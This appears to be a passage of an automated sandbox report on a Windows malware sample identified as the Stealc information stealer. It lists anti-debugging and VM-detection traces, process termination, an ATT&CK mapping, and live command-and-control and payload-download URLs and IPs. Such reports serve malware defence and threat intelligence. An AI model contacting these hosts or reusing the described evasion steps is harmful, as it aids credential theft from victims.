                  Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-31943
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-31935
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00404A60 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,1_2_00404A60
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042A3E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3E3
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00404A60 VirtualProtect 00000000,00000004,00000100,?1_2_00404A60
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0041EC6E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC6E
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042FE6F mov eax, dword ptr fs:[00000030h]0_2_0042FE6F
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_02C0DA5B push dword ptr fs:[00000030h]0_2_02C0DA5B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_047000D6 mov eax, dword ptr fs:[00000030h]0_2_047000D6
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D0D90 mov eax, dword ptr fs:[00000030h]0_2_046D0D90
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046D092B mov eax, dword ptr fs:[00000030h]0_2_046D092B
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_004265A0 mov eax, dword ptr fs:[00000030h]1_2_004265A0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C96807 mov eax, dword ptr fs:[00000030h]1_2_02C96807
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C70D90 mov eax, dword ptr fs:[00000030h]1_2_02C70D90
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C7092B mov eax, dword ptr fs:[00000030h]1_2_02C7092B
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02D6CD1B push dword ptr fs:[00000030h]1_2_02D6CD1B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0043BBD1 GetProcessHeap,0_2_0043BBD1
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0042A3E3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3E3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004104E3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104E3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00410676 SetUnhandledExceptionFilter,0_2_00410676
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0040F927 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F927
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046FA64A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_046FA64A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E074A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_046E074A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046E08DD SetUnhandledExceptionFilter,0_2_046E08DD
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046DFB8E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_046DFB8E
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C97A2F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_02C97A2F
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C99BF0 SetUnhandledExceptionFilter,1_2_02C99BF0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C98011 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02C98011
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: ED60.tmp.exe PID: 7532, type: MEMORYSTR
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_004248B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_004248B0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C94A87 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_02C94A87
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C94B17 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_02C94B17
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeProcess created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_0041078B cpuid 0_2_0041078B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B01A
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_004351D0
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0043B2DD
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0043B292
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0043B378
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B405
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0043B655
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B77E
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0043B885
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B952
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_00434DDD
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_04705437
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0470B4F9
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0470B544
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_0470B5DF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: EnumSystemLocalesW,0_2_04705044
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0470B281
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0470B8BC
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0470B9E5
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetLocaleInfoW,0_2_0470BAEC
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0470BBB9
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_02C93197
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004103DD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103DD
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00422C10 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00422C10
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C96767 GetTimeZoneInformation,1_2_02C96767
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004163FA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163FA
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 1.3.ED60.tmp.exe.2cb0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.2c70e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.2c70e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.ED60.tmp.exe.2cb0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ED60.tmp.exe PID: 7532, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  barindex
                  Yara detected Stealc
                  Source: Yara matchFile source: 1.3.ED60.tmp.exe.2cb0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.2c70e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.2c70e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.ED60.tmp.exe.2cb0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ED60.tmp.exe PID: 7532, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_004218DC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218DC
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_00420C06 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C06
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F0E6D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_046F0E6D
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeCode function: 0_2_046F1B43 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_046F1B43

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		OS Credential Dumping2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Create Account                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol3
                  Clipboard Data                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing                  		NTDS34
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets1
                  Query Registry                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials131
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Virtualization/Sandbox Evasion                  		DCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection                  		Proc Filesystem11
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  6X4BIzTTBR.exe34%ReversingLabs
                  6X4BIzTTBR.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\ED60.tmp.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe34%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\ED60.tmp.exe34%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://92.255.57.88/7bbacc20a3bd2eb5.phpM100%Avira URL Cloudmalware
                  http://92.255.57.88100%Avira URL Cloudmalware
                  http://92.255.57.88/7bbacc20a3bd2eb5.phpK100%Avira URL Cloudmalware
                  http://92.255.57.88BR0%Avira URL Cloudsafe
                  http://92.255.57.88/7bbacc20a3bd2eb5.phpf100%Avira URL Cloudmalware
                  http://92.255.57.88/_100%Avira URL Cloudmalware
                  http://92.255.57.88/7bbacc20a3bd2eb5.phpb100%Avira URL Cloudmalware
                  http://92.255.57.88/System32100%Avira URL Cloudmalware
                  http://176.113.115.37/ScreenUpdateSync.exeh51rtjrk4e8rerSOFTWARE0%Avira URL Cloudsafe
                  http://92.255.57.88/t100%Avira URL Cloudmalware
                  http://176.113.115.37/ScreenUpdateSync.exekm0%Avira URL Cloudsafe
                  http://92.255.57.88/7bbacc20a3bd2eb5.php100%Avira URL Cloudmalware
                  http://92.255.57.88/100%Avira URL Cloudmalware
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEH100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		172.67.179.207
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                      		high
                      http://92.255.57.88/7bbacc20a3bd2eb5.phptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://92.255.57.88/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://92.255.57.88/7bbacc20a3bd2eb5.phpMED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://post-to-me.com/track_prt.php?sub=&cc=DE6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://92.255.57.88ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://92.255.57.88/7bbacc20a3bd2eb5.phpKED60.tmp.exe, 00000001.00000002.2250290445.0000000002DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://post-to-me.com/track_prt.php?sub=6X4BIzTTBR.exefalse
                          		high
                          http://92.255.57.88/_ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://92.255.57.88BRED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://92.255.57.88/7bbacc20a3bd2eb5.phpfED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://92.255.57.88/7bbacc20a3bd2eb5.phpbED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://92.255.57.88/tED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://176.113.115.37/ScreenUpdateSync.exeh51rtjrk4e8rerSOFTWARE6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://92.255.57.88/System32ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://post-to-me.com/6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.7.drfalse
                              		high
                              http://176.113.115.37/ScreenUpdateSync.exe6X4BIzTTBR.exe, 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://176.113.115.37/ScreenUpdateSync.exekm6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://post-to-me.com/track_prt.php?sub=0&cc=DEH6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                176.113.115.37
                                		unknownRussian Federation
                                		49505SELECTELRUfalse
                                172.67.179.207
                                		post-to-me.comUnited States
                                		13335CLOUDFLARENETUSfalse
                                92.255.57.88
                                		unknownRussian Federation
                                		42253TELSPRUtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1563391
                                Start date and time:2024-11-26 22:46:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 25s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:9
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:6X4BIzTTBR.exe
                                renamed because original name is a hash value
                                Original Sample Name:5a45cfe0b266362b482cace7205c2c32.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@4/7@1/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 48
                                • Number of non-executed functions: 355
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
